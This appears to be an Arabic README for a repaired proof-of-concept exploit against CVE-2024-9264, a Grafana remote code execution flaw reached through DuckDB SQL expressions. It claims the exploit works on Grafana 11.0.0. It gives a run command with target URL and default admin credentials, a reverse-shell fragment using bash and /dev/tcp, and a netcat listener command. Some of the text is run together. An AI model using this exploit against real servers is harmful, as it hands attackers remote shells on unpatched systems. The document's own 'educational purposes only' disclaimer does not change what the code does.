
إثبات مفهوم مُصلح لثغرة CVE-2024-9264، وهي ثغرة حرجة في Grafana تسمح بتنفيذ الأوامر عن بُعد عبر تعبيرات DuckDB SQL. تنفذ شل عكسية باستخدام امتداد shellfs المُصحح ودالة writefile().
هذا هو الإصدار المُصلح من استغلال إثبات المفهوم لـ CVE-2024-9264، وهي ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد في Grafana (عبر تعبيرات SQL و DuckDB).
🔗 الإعلان الأصلي: إصدار Grafana الأمني
❌ إثبات المفهوم الأصلي: معطل بسبب أخطاء في الصياغة والاستخدام غير الصحيح لـ write_file()
✅ هذا الإصدار يعمل، تم اختباره على مثيل Grafana 11.0.0 به ثغرة.
writefile() بشكل صحيح بدلاً من write_file() (دالة DuckDB)bash -i >& /dev/tcp/...shellfsinstall shellfs from communitypython3 fixed_poc_writefile.py \
--url http://target:3000 \
--username admin \
--password admin \
--reverse-ip <YOUR_IP> \
--reverse-port 4444
ثم استمع باستخدام:
nc -lvnp 4444
هذا المشروع لأغراض تعليمية فقط.
لا تستخدمه ضد أهداف ليس لديك إذن لاختبارها.
تم التعديل والتحقق من قبل Exerr — إثبات المفهوم الأصلي بواسطة z3k0sec.